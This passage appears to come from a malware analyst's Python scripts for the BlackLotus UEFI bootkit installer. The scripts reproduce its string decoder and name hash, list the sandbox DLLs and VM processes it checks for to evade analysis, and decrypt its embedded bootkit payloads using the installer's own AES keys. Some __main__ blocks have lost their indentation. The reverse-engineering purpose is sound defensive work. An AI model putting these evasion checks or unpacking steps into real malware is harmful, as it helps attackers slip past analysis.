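    data: obfuscated byte values; size: their count (the last slot is the
    terminator, so the decoded text is size-1 characters long).
    isnew: True resets the shared buffer so the text starts at sbuf[0];
    False appends after the previously decoded strings.

    Prints the decoded text (without the terminator; undecodable bytes are
    replaced instead of aborting the run) and returns the raw decoded bytes,
    size bytes long and NUL-terminated, so callers can use the result instead
    of scraping stdout. Inputs shorter than 2 yield b'' like the installer's
    NULL return. Raises ValueError when the result would not fit in the
    fixed buffer, which the installer does not check.
    """
    global sbuf, sbuf_offset
    if size < 2:
        return b''
    if isnew:
        sbuf_offset = 0
        sbuf = [0 for i in range(BUF_SIZE)]
    # The XOR chain reads one slot past the string (the zero left there by the
    # reset or by the previous decode's terminator), so size + 1 slots must fit.
    if sbuf_offset + size + 1 > BUF_SIZE:
        raise ValueError('decode buffer overflow: offset %d + size %d exceeds %d'
                         % (sbuf_offset, size, BUF_SIZE))
    # 1. running XOR from the end: out[i-1] = out[i] ^ map(in[i-1]), where
    #    values above 0x7f are first reduced by 0x60.
    for i in range(size, 0, -1):
        t = data[i-1]-0x60
        if data[i-1] <= 0x7f:
            t = data[i-1]
        sbuf[sbuf_offset+i-1] = sbuf[sbuf_offset+i] ^ t
    # 2. swap every adjacent pair
    if size != 1:
        for i in range(0, size-1, 2):
            t = sbuf[sbuf_offset+i]
            sbuf[sbuf_offset+i] = sbuf[sbuf_offset+i+1]
            sbuf[sbuf_offset+i+1] = t
    # 3. reverse the whole string
    for i in range(size//2):
        t = sbuf[sbuf_offset+i]
        sbuf[sbuf_offset+i] = sbuf[sbuf_offset+size-1-i]
        sbuf[sbuf_offset+size-1-i] = t
    # 4. terminate
    sbuf[sbuf_offset+size-1] = 0
    out = bytes(sbuf[sbuf_offset:sbuf_offset+size])
    print(out[:-1].decode('utf-8', errors='replace'))
    sbuf_offset += size
    return out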
calc hash
# Name tables whose 32-bit hashes (shash below) the installer compares at
# runtime instead of the plain strings. The three lists presumably back
# anti_sandbox_check_loaded_dlls_basename / _fullname and
# anti_sandbox_check_processes_running -- confirm against the call sites.
# Sandbox and AV hook DLLs: one of these loaded in the process means an
# instrumented run.
dlls = [
b"avghookx.dll",
b"avghooka.dll",
b"snxhk.dll",
b"sbiedll.dll",
b"dbghelp.dll",
b"api_log.dll",
b"dir_watch.dll",
b"pstorec.dll",
b"vmcheck.dll",
b"wpespy.dll",
b"cmdvrt64.dll",
b"cmdvrt32.dll",
]
# Generic file names analysis sandboxes give submitted samples.
known_file_names = [b"sample.exe",
b"bot.exe",
b"sandbox.exe",
b"malware.exe",
b"test.exe",
b"klavme.exe",
b"myapp.exe",
b"testapp.exe",]
# Guest-tool processes of common hypervisors (e.g. VMware, Virtual PC, QEMU,
# Xen, Parallels, VirtualBox); any running one marks a virtualised host.
proc_name = [
b'vmsrvc.exe',
b'vmusrvc.exe',
b"vmtoolsd.exe",
b"vmwaretray.exe",
b"vmwareuser.exe",
b"VGAuthService.exe",
b"vmacthlp.exe",
b"VMSrvc.exe",
b"VMUSrvc.exe",
b"qemu-ga.exe",
b"xenservice.exe",
b"prl_cc.exe",
b"prl_tools.exe",
b"vboxservice.exe",
b"vboxtray.exe",
]
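def shash(data, size, numb=0x1003F):
    """Reproduce the installer's 32-bit string hash used for its name lookups
    (see the DLL / file-name / process tables above).

    data: the bytes to hash; size: how many leading bytes to use (len(data)
    in every call here); numb: the multiplier, 0x1003F by default.
    Returns the low 32 bits of the polynomial rolling hash
    sum(data[i] * numb**(size-1-i)). Reducing mod 2**32 after every step
    gives the same value as the original single final mask (masking commutes
    with + and *) while keeping the intermediate a plain 32-bit number instead
    of a growing big integer.
    """
    tmp = 0
    for i in range(size):
        tmp = (data[i] + numb * tmp) & 0xffffffff
    return tmp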
# Print "name 0xHASH" for every table entry so the constants can be matched
# against the hash values the installer's anti-sandbox checks compare.
if __name__ == '__main__':
datas=[dlls,known_file_names,proc_name]
print('calc hash')
for d in datas:
for x in d:
print('%s 0x%08X' % (x.decode(), shash(x, len(x))))
print('#############################################################################\n\n')
dec_aes&dec_lzms
import ctypes as c
from ctypes import wintypes as w
from my_datas import *
from Crypto.Cipher import AES
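def _pkcs7_unpad(data, block=16):
    """Strip PKCS#7 padding from a decrypted CBC buffer.

    The installer calls BCryptDecrypt with dwFlags = 1 (BCRYPT_BLOCK_PADDING),
    so CNG removes the padding for it; pycryptodome's CBC mode does not, which
    leaves 1..16 padding bytes at the end of the plaintext.
    Returns the unpadded bytes. When the length is not a block multiple or the
    trailer is not valid padding the data is returned unchanged with a warning,
    so nothing is ever silently truncated.
    """
    if not data or len(data) % block:
        print('warning: length %d is not a multiple of %d, padding left intact'
              % (len(data), block))
        return data
    n = data[-1]
    if 1 <= n <= block and data[-n:] == bytes([n]) * n:
        return data[:-n]
    print('warning: trailer is not PKCS#7 padding, left intact')
    return data


def dec_aes(encdata, outpath, key):
    """AES-256-CBC decrypt encdata with key and write the plaintext to outpath.

    key: the 32-byte key embedded in the installer. The IV is 16 zero bytes,
    reproducing the NULL IV the installer's aes_256_cbc_decrypt passes to
    BCryptDecrypt; the PKCS#7 padding is stripped to match its
    BCRYPT_BLOCK_PADDING flag. Prints 'ov' when the file has been written.
    """
    iv = b'\x00'*16
    aes = AES.new(key, AES.MODE_CBC, iv)
    dec = _pkcs7_unpad(aes.decrypt(bytes(encdata)))
    with open(outpath, 'wb') as f:
        f.write(dec)
    print('ov')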
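# cabinet.dll Compression API, the decompressor the installer reaches through
# its decompress_lzms. Algorithm id 5 is COMPRESS_ALGORITHM_LZMS.
COMPRESS_ALGORITHM_LZMS = 5

cabinet = c.WinDLL("cabinet")

'''
BOOL CreateDecompressor(
[in] DWORD Algorithm,
[in, optional] PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines,
[out] PDECOMPRESSOR_HANDLE DecompressorHandle
);
'''
CreateDecompressor = cabinet.CreateDecompressor
CreateDecompressor.argtypes = [w.DWORD, w.LPVOID, w.LPHANDLE]
CreateDecompressor.restype = w.BOOL

'''
BOOL Decompress(
[in] DECOMPRESSOR_HANDLE DecompressorHandle,
[in] LPCVOID CompressedData,
[in] SIZE_T CompressedDataSize,
[out] PVOID UncompressedBuffer,
[in] SIZE_T UncompressedBufferSize,
[out] PSIZE_T UncompressedDataSize
);
'''
# SIZE_T is an unsigned pointer-sized integer, ctypes.c_size_t. The earlier
# wintypes.SIZE ({cx, cy} struct) only worked because an 8-byte struct is
# passed like an integer on x64; with real argtypes ctypes checks every call.
Decompress = cabinet.Decompress
Decompress.argtypes = [w.HANDLE, w.LPCVOID, c.c_size_t, w.LPVOID, c.c_size_t, c.POINTER(c.c_size_t)]
Decompress.restype = w.BOOL

CloseDecompressor = cabinet.CloseDecompressor
CloseDecompressor.argtypes = [w.HANDLE]
CloseDecompressor.restype = w.BOOL


def lzms(data, size):
    """LZMS-decompress the first size bytes of data with cabinet!Decompress.

    Returns the decompressed bytes, or None when the decompressor cannot be
    created or the data does not decompress. The first Decompress call uses a
    NULL output buffer and is expected to fail while reporting the required
    size (ERROR_INSUFFICIENT_BUFFER per the Compression API docs); the second
    call does the real work. The decompressor handle is always closed.
    """
    h = w.HANDLE(0)
    if not CreateDecompressor(COMPRESS_ALGORITHM_LZMS, None, c.byref(h)):
        return None
    try:
        c_data = (c.c_ubyte * size)(*data[:size])
        c_outsz = c.c_size_t(0)
        ok = Decompress(h, c_data, size, None, 0, c.byref(c_outsz))
        # A success with no buffer, or no size reported, means nothing to do.
        if ok or c_outsz.value == 0:
            return None
        c_outbuf = (c.c_ubyte * c_outsz.value)()
        ok = Decompress(h, c_data, size, c_outbuf, c_outsz.value, c.byref(c_outsz))
        if not ok:
            return None
        return bytes(c_outbuf[:c_outsz.value])
    finally:
        CloseDecompressor(h)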
def dec_lzms(key, data, outpath):
    """Decrypt data (AES-256-CBC, zero IV, as in the installer's
    decompress_crypted_lzms) then LZMS-decompress it and write the result to
    outpath. Prints 'ov' on success and 'lzms none!' when decompression fails.
    """
    plain = AES.new(key, AES.MODE_CBC, b'\x00'*16).decrypt(bytes(data))
    unpacked = lzms(plain, len(plain))
    if not unpacked:
        print('lzms none!')
        return
    with open(outpath, 'wb') as f:
        f.write(unpacked)
    print('ov')
# Unpack every embedded blob from my_datas. lzms_key is the 32-byte AES-256
# key used for both the LZMS-compressed PE payloads and the AES-only blobs;
# the commented dec_aes line keeps a different key the author noted for the
# bootkit blob.
if __name__ == '__main__':
# dec_aes(bootkit_data,'bootkit.bin',b'By3h2zWrQxPF9ijYLqMl8ojenCInrWZG')
lzms_key=b'6jxkPUHKRK5rgdg0PkhLhuS844uMYgrm'
dec_lzms(lzms_key, lzms_shim_data,mdir+'shim.bin')
dec_lzms(lzms_key, lzms_official_bootmgfw_data,mdir+'official_bootmgfw.bin')
dec_lzms(lzms_key, lzms_official_bootmgr_data,mdir+'official_bootmgr.bin')
dec_lzms(lzms_key, lzms_hvloader_data,mdir+'hvloader.bin')
dec_aes(bcd_setup0_encdata, mdir+'bcd_setup0.bin',lzms_key)
dec_aes(bcd_exp_encdata, mdir+'bcd_exp.bin',lzms_key)
dec_aes(mcupdate_encdata, mdir+'mcupdate.bin',lzms_key)
参考链接
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/